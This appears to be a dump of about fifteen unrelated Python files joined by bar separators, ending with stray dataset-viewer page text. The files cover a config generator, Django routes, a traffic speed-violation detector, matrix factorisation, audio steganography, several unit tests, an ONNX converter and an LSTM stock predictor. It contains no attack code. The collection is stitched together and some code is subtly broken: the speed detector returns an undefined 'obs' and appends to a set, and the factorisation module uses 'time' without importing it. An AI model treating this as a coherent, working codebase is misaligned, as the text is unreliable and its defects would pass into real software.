with v["state_file"].open("w") as stream:
dump_yaml(state, stream=stream)
def _output_data(v, documents):
"""Save and display generated config."""
v["module_dir"].mkdir(parents=True, exist_ok=True)
if v["config_file"].exists():
v["config_file"].rename(v["backup_file"])
config = load_yaml(INITIAL_MODULE_CONFIG.format(**v).strip())
output = dump_yaml_into_str(documents)
config = combine(config, {
v["M_MODULE_SHORT"]: {
"config": to_literal_scalar(output),
},
})
with v["config_file"].open("w") as stream:
dump_yaml(config, stream=stream)
dump_yaml(config, stream=sys.stdout)
def main(variables={}):
"""Handle init method."""
# Compute paths
v = variables
v["shared_dir"] = get_path(v["M_SHARED"])
v["template_dir"] = get_path(v["M_TEMPLATES"])
v["module_dir"] = get_path(
str(v["shared_dir"] / v["M_MODULE_SHORT"]))
v["config_file"] = get_path(
str(v["module_dir"] / v["M_CONFIG_NAME"]))
v["state_file"] = get_path(
str(v["shared_dir"] / v["M_STATE_FILE_NAME"]))
v["backup_file"] = get_path(
str(v["module_dir"] / (v["M_CONFIG_NAME"] + ".backup")))
cluster = _process_cluster(v)
mapping = _process_feature_mapping(v)
machines, cluster = _process_machines(v, cluster)
components = _process_components(v, cluster)
applications = _process_applications(v)
_output_data(v, [cluster] + [mapping]
+ machines
+ components
+ [applications])
_update_state_file(v)
|
from django.urls import path
from . import views
'''
This file specifies the mapping between urls and views
Note: The "name" parameter is used in tests to decouple the urls from tests. This mean that you can change the urls and
not affect the tests if the name parameter is unchanged
'''
app_name = 'backend'
urlpatterns = [
path('filter/get_matching_clips', views.filter_get_matching_clips, name='filter get matching'),
path('filter/modify', views.filter_modify, name='filter modify'),
path('project/get_all', views.project_get_all, name='project get all'),
path('project/new', views.project_new, name='project new'),
path('project/delete', views.project_delete, name='project delete'),
path('project/rename', views.project_rename, name='project rename'),
path('export/filter', views.export_filter, name='export filter'),
path('export/clips', views.export_clips, name='export clips'),
path('video/get_info', views.video_get_info, name='video info'),
path('video/get_cameras', views.video_get_cameras, name='video get cameras'),
path('file/get_folders', views.file_get_folders, name='file get folders'),
path('file/add_folder', views.file_add_folder, name='file add folder'),
path('object_detection/detect_objects', views.detect_objects, name='detect objects'),
path('object_detection/get_progress', views.get_progress, name='get progress'),
path('object_detection/delete_progress', views.delete_progress, name='delete progress'),
]
|
import tkinter
from tkinter import *
import cv2
import PIL.Image, PIL.ImageTk
import time
import argparse
import os
from keras import backend as K
import tensorflow as tf
from scipy.spatial import distance as dist
from imutils.video import VideoStream
from imutils import face_utils
from threading import Thread
import numpy as np
import playsound
import argparse
import imutils
import time
import dlib
import cv2
import pickle
import pyttsx3
from tensorflow.keras.applications.mobilenet_v2 import preprocess_input
from collections import deque
from src.vehicles.number_plate_recognition.number_plate_recognition_service import NumberPlateRecognitionService
class SpeedLimitsViolationService:
def __init__(self, args):
# modules
self.number_plate_recognition_service = NumberPlateRecognitionService()
# variables
self.violators_queue = deque(maxlen=3)
self.last_time_violated = dict()
self.num_violations = 0
def find_by_id(self, detection_queue, car_id):
for obj in detection_queue:
if obj['id'] == car_id:
return obs
return None
def process(self, prev_ego_state, ego_state, frame_queue, detection_queue, current_car_ids, curr_time, dt, max_speed):
new_violation_candidates = set()
result_violators = set()
# find violators
for car_id in current_car_ids:
if len(detection_queue) < 2 or self.find_by_id(detection_queue[-2], car_id) is None:
continue
prev_car_state = self.find_by_id(detection_queue[-2], car_id)
curr_car_state = self.find_by_id(detection_queue[-1], car_id)
prev_car_x = prev_car_state['center'][0] + prev_ego_state['position_x']
prev_car_y = prev_car_state['center'][1] + prev_ego_state['position_y']
curr_car_x = curr_car_state['center'][0] + ego_state['position_x']
curr_car_y = curr_car_state['center'][1] + ego_state['position_y']
pos_shift_x, pos_shift_y = abs(curr_car_x - prev_car_x), abs(curr_car_y - prev_car_y)
pos_shift = np.sqrt(pos_shift_x ** 2 + pos_shift_y ** 2)
speed = pos_shift / dt
if speed >= max_speed + 20:
new_violation_candidates.add(car_id)
self.num_violations += 1
print("Warning! Speed limit violation detected.")
if (len(self.violators_queue) >= 2) and (car_id in self.violators_queue[-1]) and \
(car_id in self.violators_queue[-2]) and (car_id not in self.last_time_violated or \
curr_time - self.last_time_violated[car_id] > 60):
result_violators.append(car_id)
self.last_time_violated[car_id] = curr_time
self.violators_queue.append(new_violation_candidates)
# recognize number plates
for car_id in result_violators:
det = self.find_by_id(detection_queue[-1], car_id)
x_min, y_min, x_max, y_max = det['2d_bbox']
x_min = max(0, x_min - 50)
y_min = max(0, y_min - 50)
x_max = min(frame_queue[-1].shape[1] - 1, x_max + 50)
y_max = min(frame_queue[-1].shape[0] - 1, y_max + 50)
crop = frame_queue[-1][x_min: x_max + 1, y_min: y_max + 1, :]
number_plate = self.number_plate_recognition_service.process(crop)['number_plate']
if number_plate is not None:
pickle_data = {'type': "speed limit violation", 'number plate': number_plate, 'frames': frame_queue}
pickle_path = f"database/speed_limit_violations/{self.num_violations}.pkl"
pickle.dump(pickle_data, open(pickle_path, 'wb'))
|
"""
like batched_inv, but this implementation runs the sparse matrix stuff in a set of separate processes to speed things up.
"""
import numpy as np
import wmf
import batched_inv
import multiprocessing as mp
import Queue
def buffered_gen_mp(source_gen, buffer_size=2, sleep_time=1):
"""
Generator that runs a slow source generator in a separate process.
buffer_size: the maximal number of items to pre-generate (length of the buffer)
"""
buffer = mp.Queue(maxsize=buffer_size)
def _buffered_generation_process(source_gen, buffer):
while True:
# we block here when the buffer is full. There's no point in generating more data
# when the buffer is full, it only causes extra memory usage and effectively
# increases the buffer size by one.
while buffer.full():
# print "DEBUG: buffer is full, waiting to generate more data."
time.sleep(sleep_time)
try:
data = source_gen.next()
except StopIteration:
# print "DEBUG: OUT OF DATA, CLOSING BUFFER"
buffer.close() # signal that we're done putting data in the buffer
break
buffer.put(data)
process = mp.Process(target=_buffered_generation_process, args=(source_gen, buffer))
process.start()
while True:
try:
# yield buffer.get()
# just blocking on buffer.get() here creates a problem: when get() is called and the buffer
# is empty, this blocks. Subsequently closing the buffer does NOT stop this block.
# so the only solution is to periodically time out and try again. That way we'll pick up
# on the 'close' signal.
try:
yield buffer.get(True, timeout=sleep_time)
except Queue.Empty:
if not process.is_alive():
break # no more data is going to come. This is a workaround because the buffer.close() signal does not seem to be reliable.
# print "DEBUG: queue is empty, waiting..."
pass # ignore this, just try again.
except IOError: # if the buffer has been closed, calling get() on it will raise IOError.
# this means that we're done iterating.
# print "DEBUG: buffer closed, stopping."
break
class CallableObject(object):
"""
Hack for multiprocessing stuff. This creates a callable wrapper object
with a single argument, that calls the original function with this argument
plus any other arguments passed at creation time.
"""
def __init__(self, func, *args, **kwargs):
self.func = func
self.args = args
self.kwargs = kwargs
def __call__(self, arg):
return self.func(arg, *self.args, **self.kwargs)
def get_row(S, i):
lo, hi = S.indptr[i], S.indptr[i + 1]
return S.data[lo:hi], S.indices[lo:hi]
def build_batch(b, S, Y_e, b_y, byY, YTYpR, batch_size, m, f, dtype):
lo = b * batch_size
hi = min((b + 1) * batch_size, m)
current_batch_size = hi - lo
A_stack = np.empty((current_batch_size, f + 1), dtype=dtype)
B_stack = np.empty((current_batch_size, f + 1, f + 1), dtype=dtype)
for ib, k in enumerate(xrange(lo, hi)):
s_u, i_u = get_row(S, k)
Y_u = Y_e[i_u] # exploit sparsity
b_y_u = b_y[i_u]
A = (s_u + 1).dot(Y_u)
A -= np.dot(b_y_u, (Y_u * s_u[:, None]))
A -= byY
YTSY = np.dot(Y_u.T, (Y_u * s_u[:, None]))
B = YTSY + YTYpR
A_stack[ib] = A
B_stack[ib] = B
return A_stack, B_stack
def recompute_factors_bias_batched_mp(Y, S, lambda_reg, dtype='float32', batch_size=1, solve=batched_inv.solve_sequential, num_batch_build_processes=4):
m = S.shape[0] # m = number of users
f = Y.shape[1] - 1 # f = number of factors
b_y = Y[:, f] # vector of biases
Y_e = Y.copy()
Y_e[:, f] = 1 # factors with added column of ones
YTY = np.dot(Y_e.T, Y_e) # precompute this
R = np.eye(f + 1) # regularization matrix
R[f, f] = 0 # don't regularize the biases!
R *= lambda_reg
YTYpR = YTY + R
byY = np.dot(b_y, Y_e) # precompute this as well
X_new = np.zeros((m, f + 1), dtype=dtype)
num_batches = int(np.ceil(m / float(batch_size)))
func = CallableObject(build_batch, S, Y_e, b_y, byY, YTYpR, batch_size, m, f, dtype)
pool = mp.Pool(num_batch_build_processes)
batch_gen = pool.imap(func, xrange(num_batches))
batch_gen_buffered = buffered_gen_mp(batch_gen, buffer_size=2, sleep_time=0.001)
for b, (A_stack, B_stack) in enumerate(batch_gen):
lo = b * batch_size
hi = min((b + 1) * batch_size, m)
X_stack = solve(A_stack, B_stack)
X_new[lo:hi] = X_stack
return X_new
|
from audio.insertor import Inserter
from helper.file import File
file_dir = 'sample/audio/StarWars3.wav'
secret_message_dir = 'sample/text/message.txt'
key = "kuncirahasia"
insert = Inserter(file_dir, secret_message_dir, key)
frame_modified = insert.insert_message(
randomize_bytes=False,
randomize_frames=False,
encrypted=False,
)
output_filename = 'output/output.wav'
output_file = File(output_filename)
output_file.write_audio_file(frame_modified, insert.params)
|
from pyglottolog.links import endangeredlanguages, wikidata
def test_el(elcat):
res = endangeredlanguages.read()
assert len(res) == 1
assert len(res[0].coordinates) == 1
assert res[0].url.endswith('1')
def test_wikidata(mocker, api_copy):
class wd(object):
def post(self, *args, **kw):
return mocker.Mock(text='glottocode,item,wikipedia\nabcd1235,http://example.org,xyz')
langs = {l.id: l for l in api_copy.languoids()}
mocker.patch('pyglottolog.links.wikidata.requests', wd())
assert list(wikidata.Wikidata().iterupdated(langs.values()))
assert 'https://example.org' in [l.url for l in langs['abcd1235'].links]
assert not list(wikidata.Wikidata().iterupdated(langs.values()))
|
#!/usr/bin/env python
"""The setup script."""
from setuptools import setup, find_packages
if "__main__" == __name__:
setup(
author="Hao-Ting Wang",
author_email='htwangtw@gmail.com',
python_requires='>=3.7',
description="Crawl public BIDS dataset on AWS to datalad",
name='publiccrawler',
packages=find_packages(),
version='0.1.0',
install_requires=['boto', 'click'],
entry_points='''
[console_scripts]
s3crawler=publiccrawler.crawler:cli
''',
)
|
"""
A threaded shared-memory scheduler
See async.py
"""
from __future__ import absolute_import, division, print_function
from multiprocessing.pool import ThreadPool
from threading import current_thread
from .async import get_async, inc, add
from .compatibility import Queue
from .context import _globals
default_pool = ThreadPool()
def _thread_get_id():
return current_thread().ident
def get(dsk, result, cache=None, **kwargs):
""" Threaded cached implementation of dask.get
Parameters
----------
dsk: dict
A dask dictionary specifying a workflow
result: key or list of keys
Keys corresponding to desired data
nthreads: integer of thread count
The number of threads to use in the ThreadPool that will actually execute tasks
cache: dict-like (optional)
Temporary storage of results
Examples
--------
>>> dsk = {'x': 1, 'y': 2, 'z': (inc, 'x'), 'w': (add, 'z', 'y')}
>>> get(dsk, 'w')
4
>>> get(dsk, ['w', 'y'])
(4, 2)
"""
pool = _globals['pool']
if pool is None:
pool = default_pool
queue = Queue()
results = get_async(pool.apply_async, len(pool._pool), dsk, result,
cache=cache, queue=queue, get_id=_thread_get_id,
**kwargs)
return results
|
import numpy as np
from cogue.crystal.utility import klength2mesh
class Imaginary:
def __init__(self,
phonon,
distance=200):
self._phonon = phonon # Phonopy object
self._lattice = np.array(phonon.get_unitcell().get_cell().T,
dtype='double')
self._mesh = None
self._ratio = None
self._set_mesh(distance=distance)
self._run_mesh_sampling()
self._search_imaginary_qpoint_ratio()
def get_imaginary_qpoint_ratio(self):
return self._ratio
def get_lattice(self):
return self._lattice
def get_mesh(self):
return self._mesh
def _set_mesh(self, distance=200):
self._mesh = klength2mesh(distance, self._lattice)
def _run_mesh_sampling(self):
self._phonon.set_mesh(self._mesh)
def _search_imaginary_qpoint_ratio(self):
_, weights, freqs, _ = self._phonon.get_mesh()
self._ratio = (float(np.extract(freqs[:, 0] < 0, weights).sum()) /
np.prod(self._mesh))
if __name__ == '__main__':
import sys
import yaml
from phonopy import Phonopy
from phonopy.interface.phonopy_yaml import phonopyYaml
from phonopy.file_IO import parse_FORCE_SETS
from cogue.crystal.utility import get_angles, get_lattice_parameters
import matplotlib
if len(sys.argv) > 1:
cell = phonopyYaml(sys.argv[1]).get_atoms()
else:
cell = phonopyYaml("POSCAR-unitcell.yaml").get_atoms()
phonon_info = yaml.load(open("phonon.yaml"))
phonon = Phonopy(cell,
phonon_info['supercell_matrix'],
is_auto_displacements=False)
force_sets = parse_FORCE_SETS()
phonon.set_displacement_dataset(force_sets)
phonon.produce_force_constants()
distance = 200
imaginary = Imaginary(phonon, distance=distance)
lattice = imaginary.get_lattice()
print "lattice_lengths: [ %f, %f, %f ]" % tuple(get_lattice_parameters(lattice))
print "lattice_angles: [ %f, %f, %f ]" % tuple(get_angles(lattice))
print "mesh_length: %f" % distance
print "mesh: [ %d, %d, %d ]" % tuple(imaginary.get_mesh())
print "ratio: %f" % imaginary.get_imaginary_qpoint_ratio()
|
import unittest
from my_test_api import TestAPI
class TestCreateIssue(TestAPI):
def test_create_issue(self):
params = {
'project': 'API',
'summary': 'test issue by robots',
'description': 'You are mine ! ',
}
response = self.put('/issue/', params)
issue_id = response.headers['Location'].split('/')[-1]
print('Created item ID is ', issue_id)
self.assertEquals(response.status_code, 201)
response = self.get('/issue/' + issue_id)
self.assertEquals(response.status_code, 200)
if __name__ == '__main__':
unittest.main()
|
import imageio
import os
filenames=sorted((fn for fn in os.listdir('.') if fn.endswith('.png')))
print filenames
images = []
for filename in filenames:
images.append(imageio.imread(filename))
imageio.mimsave('run_2_anom.gif', images)
|
import unittest
from geom2d import Point, Size, Rect
from graphic.svg.image import svg_content
class TestSvgImage(unittest.TestCase):
size = Size(200, 350)
viewbox = Rect(Point(4, 5), Size(180, 230))
def test_parse_width(self):
svg = svg_content(self.size, [])
self.assertTrue('width="200"' in svg)
def test_parse_height(self):
svg = svg_content(self.size, [])
self.assertTrue('height="350"' in svg)
def test_parse_default_viewbox(self):
svg = svg_content(self.size, [])
self.assertTrue('viewBox="0 0 200 350"' in svg)
def test_parse_viewbox(self):
svg = svg_content(self.size, [], self.viewbox)
self.assertTrue('viewBox="4 5 180 230"' in svg)
|
import numpy as np
import onnx
from collections import defaultdict
from typing import Any, Dict, List, Union
from .. import operations
from ..graph import OperationGraph
from ..operations import Operation
from ..utils import NUMPY_TO_ONNX_DTYPE
from ..visitors import OperationVisitor
def convert(op_graph: OperationGraph):
converter = OnnxConverter(op_graph)
model = converter.convert()
return model
class OnnxConverter(OperationVisitor):
def __init__(self, op_graph: OperationGraph):
self.op_graph = op_graph
self.inputs: List[onnx.ValueInfoProto] = []
self.outputs: List[onnx.ValueInfoProto] = []
self.initializer: List[onnx.TensorProto] = []
self.visited: Dict[Operation, onnx.NodeProto] = {}
self.op_counts: Dict[str, int] = defaultdict(int)
def convert(self, name="onnx_model") -> onnx.ModelProto:
output_details = self.op_graph.output_details
for op, (shape, dtype) in zip(self.op_graph.output_operations, output_details):
output_op = self.visit(op)
node = onnx.helper.make_tensor_value_info(
output_op.name, NUMPY_TO_ONNX_DTYPE[dtype], shape
)
self.outputs.append(node)
nodes = [n for n in self.visited.values() if isinstance(n, onnx.NodeProto)]
graph_def = onnx.helper.make_graph(
nodes,
name,
self.inputs,
self.outputs,
initializer=self.initializer,
)
model_def = onnx.helper.make_model(graph_def, producer_name="dnnv")
model_def = onnx.shape_inference.infer_shapes(model_def)
onnx.checker.check_model(model_def)
return model_def
def visit(self, operation: Operation) -> Union[onnx.NodeProto, onnx.ValueInfoProto]:
if operation not in self.visited:
result = super().visit(operation)
self.visited[operation] = result
return self.visited[operation]
def generic_visit(self, operation: Operation):
if not hasattr(self, "visit_%s" % operation.__class__.__name__):
raise ValueError(
"ONNX converter not implemented for operation type %s"
% operation.__class__.__name__
)
return super().generic_visit(operation)
def _to_onnx_proto(
self, value: Any, opname: str
) -> Union[onnx.NodeProto, onnx.TensorProto, onnx.ValueInfoProto]:
if isinstance(value, Operation):
return self.visit(value)
elif isinstance(value, np.ndarray):
tensor_proto = onnx.numpy_helper.from_array(value, name=opname)
self.initializer.append(tensor_proto)
return tensor_proto
raise ValueError(f"Unknown type for operand of {opname}: {type(value)}")
def visit_Add(self, operation: operations.Add) -> onnx.NodeProto:
op_type = str(operation)
idx = self.op_counts[op_type] = self.op_counts[op_type] + 1
opname = f"{op_type}_{idx}"
a = self._to_onnx_proto(operation.a, f"{opname}.a")
b = self._to_onnx_proto(operation.b, f"{opname}.b")
node = onnx.helper.make_node(
op_type,
inputs=[a.name, b.name],
outputs=[opname],
name=opname,
)
return node
def visit_AveragePool(self, operation: operations.AveragePool) -> onnx.NodeProto:
op_type = str(operation)
idx = self.op_counts[op_type] = self.op_counts[op_type] + 1
opname = f"{op_type}_{idx}"
x = self._to_onnx_proto(operation.x, f"{opname}.x")
node = onnx.helper.make_node(
op_type,
inputs=[x.name],
outputs=[opname],
kernel_shape=list(operation.kernel_shape),
ceil_mode=operation.ceil_mode,
count_include_pad=operation.count_include_pad,
strides=list(operation.strides),
pads=list(operation.pads),
name=opname,
)
return node
def visit_BatchNormalization(
self, operation: operations.BatchNormalization
) -> onnx.NodeProto:
op_type = str(operation)
idx = self.op_counts[op_type] = self.op_counts[op_type] + 1
opname = f"{op_type}_{idx}"
x = self._to_onnx_proto(operation.x, f"{opname}.x")
scale = self._to_onnx_proto(operation.scale, f"{opname}.scale")
bias = self._to_onnx_proto(operation.bias, f"{opname}.bias")
mean = self._to_onnx_proto(operation.mean, f"{opname}.mean")
variance = self._to_onnx_proto(operation.variance, f"{opname}.variance")
node = onnx.helper.make_node(
op_type,
inputs=[x.name, scale.name, bias.name, mean.name, variance.name],
outputs=[opname],
epsilon=operation.epsilon,
momentum=operation.momentum,
name=opname,
)
return node
def visit_Conv(self, operation: operations.Conv) -> onnx.NodeProto:
idx = self.op_counts["Conv"] = self.op_counts["Conv"] + 1
opname = f"Conv_{idx}"
x = self._to_onnx_proto(operation.x, f"{opname}.x")
w = self._to_onnx_proto(operation.w, f"{opname}.w")
b = self._to_onnx_proto(operation.b, f"{opname}.b")
node = onnx.helper.make_node(
"Conv",
inputs=[x.name, w.name, b.name],
outputs=[opname],
kernel_shape=list(operation.kernel_shape),
strides=list(operation.strides),
dilations=list(operation.dilations),
group=operation.group,
pads=list(operation.pads),
name=opname,
)
return node
def visit_Concat(self, operation: operations.Concat) -> onnx.NodeProto:
idx = self.op_counts["Concat"] = self.op_counts["Concat"] + 1
opname = f"Concat_{idx}"
inputs = [
self._to_onnx_proto(x, f"{opname}.x{i}") for i, x in enumerate(operation.x)
]
node = onnx.helper.make_node(
"Concat",
inputs=[x.name for x in inputs],
outputs=[opname],
axis=operation.axis,
name=opname,
)
return node
def visit_Div(self, operation: operations.Div) -> onnx.NodeProto:
op_type = str(operation)
idx = self.op_counts[op_type] = self.op_counts[op_type] + 1
opname = f"{op_type}_{idx}"
a = self._to_onnx_proto(operation.a, f"{opname}.a")
b = self._to_onnx_proto(operation.b, f"{opname}.b")
node = onnx.helper.make_node(
op_type,
inputs=[a.name, b.name],
outputs=[opname],
name=opname,
)
return node
def visit_Flatten(self, operation: operations.Flatten) -> onnx.NodeProto:
idx = self.op_counts["Flatten"] = self.op_counts["Flatten"] + 1
opname = f"Flatten_{idx}"
x = self._to_onnx_proto(operation.x, f"{opname}.x")
node = onnx.helper.make_node(
"Flatten",
inputs=[x.name],
outputs=[opname],
axis=operation.axis,
name=opname,
)
return node
def visit_Gemm(self, operation: operations.Gemm) -> onnx.NodeProto:
idx = self.op_counts["Gemm"] = self.op_counts["Gemm"] + 1
opname = f"Gemm_{idx}"
a = self._to_onnx_proto(operation.a, f"{opname}.a")
b = self._to_onnx_proto(operation.b, f"{opname}.b")
c = self._to_onnx_proto(operation.c, f"{opname}.c")
node = onnx.helper.make_node(
"Gemm",
inputs=[a.name, b.name, c.name],
outputs=[opname],
alpha=operation.alpha,
beta=operation.beta,
transA=operation.transpose_a,
transB=operation.transpose_b,
name=opname,
)
return node
def visit_GlobalAveragePool(
self, operation: operations.GlobalAveragePool
) -> onnx.NodeProto:
op_type = str(operation)
idx = self.op_counts[op_type] = self.op_counts[op_type] + 1
opname = f"{op_type}_{idx}"
x = self._to_onnx_proto(operation.x, f"{opname}.x")
node = onnx.helper.make_node(
op_type,
inputs=[x.name],
outputs=[opname],
name=opname,
)
return node
def visit_Input(self, operation: operations.Input) -> onnx.ValueInfoProto:
idx = self.op_counts["Input"] = self.op_counts["Input"] + 1
opname = f"Input_{idx}"
shape = np.asarray(operation.shape).tolist()
if shape[0] < 0:
shape[0] = 1
dtype = NUMPY_TO_ONNX_DTYPE[operation.dtype]
node = onnx.helper.make_tensor_value_info(opname, dtype, shape)
self.inputs.append(node)
return node
def visit_MatMul(self, operation: operations.MatMul) -> onnx.NodeProto:
op_type = str(operation)
idx = self.op_counts[op_type] = self.op_counts[op_type] + 1
opname = f"{op_type}_{idx}"
a = self._to_onnx_proto(operation.a, f"{opname}.a")
b = self._to_onnx_proto(operation.b, f"{opname}.b")
node = onnx.helper.make_node(
op_type,
inputs=[a.name, b.name],
outputs=[opname],
name=opname,
)
return node
def visit_MaxPool(self, operation: operations.MaxPool) -> onnx.NodeProto:
op_type = str(operation)
idx = self.op_counts[op_type] = self.op_counts[op_type] + 1
opname = f"{op_type}_{idx}"
x = self._to_onnx_proto(operation.x, f"{opname}.x")
node = onnx.helper.make_node(
op_type,
inputs=[x.name],
outputs=[opname],
kernel_shape=list(operation.kernel_shape),
ceil_mode=operation.ceil_mode,
strides=list(operation.strides),
dilations=list(operation.dilations),
pads=list(operation.pads),
storage_order=operation.storage_order,
name=opname,
)
return node
def visit_Mul(self, operation: operations.Mul) -> onnx.NodeProto:
op_type = str(operation)
idx = self.op_counts[op_type] = self.op_counts[op_type] + 1
opname = f"{op_type}_{idx}"
a = self._to_onnx_proto(operation.a, f"{opname}.a")
b = self._to_onnx_proto(operation.b, f"{opname}.b")
node = onnx.helper.make_node(
op_type,
inputs=[a.name, b.name],
outputs=[opname],
name=opname,
)
return node
def visit_Relu(self, operation: operations.Relu) -> onnx.NodeProto:
idx = self.op_counts["Relu"] = self.op_counts["Relu"] + 1
opname = f"Relu_{idx}"
x = self._to_onnx_proto(operation.x, f"{opname}.x")
node = onnx.helper.make_node(
"Relu", inputs=[x.name], outputs=[opname], name=opname
)
return node
def visit_Reshape(self, operation: operations.Reshape) -> onnx.NodeProto:
idx = self.op_counts["Reshape"] = self.op_counts["Reshape"] + 1
opname = f"Reshape_{idx}"
x = self._to_onnx_proto(operation.x, f"{opname}.x")
shape = self._to_onnx_proto(operation.shape, f"{opname}.shape")
node = onnx.helper.make_node(
"Reshape", inputs=[x.name, shape.name], outputs=[opname], name=opname
)
return node
def visit_Sigmoid(self, operation: operations.Sigmoid) -> onnx.NodeProto:
op_type = str(operation)
idx = self.op_counts[op_type] = self.op_counts[op_type] + 1
opname = f"{op_type}_{idx}"
x = self._to_onnx_proto(operation.x, f"{opname}.x")
node = onnx.helper.make_node(
op_type, inputs=[x.name], outputs=[opname], name=opname
)
return node
def visit_Sub(self, operation: operations.Sub) -> onnx.NodeProto:
op_type = str(operation)
idx = self.op_counts[op_type] = self.op_counts[op_type] + 1
opname = f"{op_type}_{idx}"
a = self._to_onnx_proto(operation.a, f"{opname}.a")
b = self._to_onnx_proto(operation.b, f"{opname}.b")
node = onnx.helper.make_node(
op_type,
inputs=[a.name, b.name],
outputs=[opname],
name=opname,
)
return node
def visit_Tanh(self, operation: operations.Tanh) -> onnx.NodeProto:
op_type = str(operation)
idx = self.op_counts[op_type] = self.op_counts[op_type] + 1
opname = f"{op_type}_{idx}"
x = self._to_onnx_proto(operation.x, f"{opname}.x")
node = onnx.helper.make_node(
op_type, inputs=[x.name], outputs=[opname], name=opname
)
return node
def visit_Transpose(self, operation: operations.Transpose) -> onnx.NodeProto:
idx = self.op_counts["Transpose"] = self.op_counts["Transpose"] + 1
opname = f"Transpose_{idx}"
x = self._to_onnx_proto(operation.x, f"{opname}.x")
node = onnx.helper.make_node(
"Transpose",
inputs=[x.name],
outputs=[opname],
name=opname,
perm=list(operation.permutation),
)
return node
|
def lstm_prediction(se, stock_symbol):
import pandas as pd
import numpy as np
def fetch_stock_data(se, stock_symbol):
from pandas_datareader import data as pdr
import yfinance as yf
yf.pdr_override()
if se == 'NSE': stock_symbol += ".NS"
return pdr.get_data_yahoo(stock_symbol, period="5y")
from sklearn.preprocessing import MinMaxScaler
from keras.models import Sequential
from keras.layers import Dense, Dropout, LSTM
og_df = fetch_stock_data(se, stock_symbol)
todataframe = og_df.reset_index(inplace=False)
print("\n<----------------------Info of the OG dataset---------------------->")
print(todataframe.info())
print("<-------------------------------------------------------------------->\n")
seriesdata = todataframe.sort_index(ascending=True, axis=0)
new_seriesdata = pd.DataFrame(index=range(0,len(todataframe)),columns=['Date','Close'])
for i in range(0,len(seriesdata)):
new_seriesdata['Date'][i] = seriesdata['Date'][i]
new_seriesdata['Close'][i] = seriesdata['Close'][i]
new_seriesdata.index = new_seriesdata.Date
new_seriesdata.drop('Date', axis=1, inplace=True)
myseriesdataset = new_seriesdata.values
totrain = myseriesdataset
scalerdata = MinMaxScaler(feature_range=(0, 1))
scale_data = scalerdata.fit_transform(myseriesdataset)
x_totrain, y_totrain = [], []
length_of_totrain=len(totrain)
for i in range(60,length_of_totrain):
x_totrain.append(scale_data[i-60:i,0])
y_totrain.append(scale_data[i,0])
x_totrain, y_totrain = np.array(x_totrain), np.array(y_totrain)
x_totrain = np.reshape(x_totrain, (x_totrain.shape[0],x_totrain.shape[1],1))
lstm_model = Sequential()
lstm_model.add(LSTM(units=50, return_sequences=True, input_shape=(x_totrain.shape[1],1)))
lstm_model.add(LSTM(units=50))
lstm_model.add(Dense(1))
lstm_model.compile(loss='mean_squared_error', optimizer='adam')
lstm_model.fit(x_totrain, y_totrain, epochs=1, batch_size=1, verbose=2)
myinputs = new_seriesdata[len(new_seriesdata) - (100) - 60:].values
myinputs = myinputs.reshape(-1,1)
myinputs = scalerdata.transform(myinputs)
tostore_test_result = []
for i in range(60,myinputs.shape[0]):
tostore_test_result.append(myinputs[i-60:i,0])
tostore_test_result = np.array(tostore_test_result)
tostore_test_result = np.reshape(tostore_test_result,(tostore_test_result.shape[0],tostore_test_result.shape[1],1))
myclosing_priceresult = lstm_model.predict(tostore_test_result)
myclosing_priceresult = scalerdata.inverse_transform(myclosing_priceresult)
datelist = pd.date_range(pd.datetime.now().date(), periods=101)[1:]
predicted_df = pd.DataFrame(myclosing_priceresult, columns=['Close'], index=datelist)
result_df = pd.concat([og_df, predicted_df])[['Close']]
result_df = result_df.reset_index(inplace=False)
result_df.columns = ['Date', 'Close']
print("\n<----------------------Info of the RESULT dataset---------------------->")
print(result_df.info())
print("<------------------------------------------------------------------------>\n")
# import matplotlib.pyplot as plt
# plt.plot(result_df['Close'])
# plt.show()
def get_json(df):
import json
import datetime
def convert_timestamp(item_date_object):
if isinstance(item_date_object, (datetime.date, datetime.datetime)):
return item_date_object.strftime("%Y-%m-%d")
dict_ = df.to_dict(orient='records')
return json.dumps(dict_, default=convert_timestamp)
return get_json(result_df)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.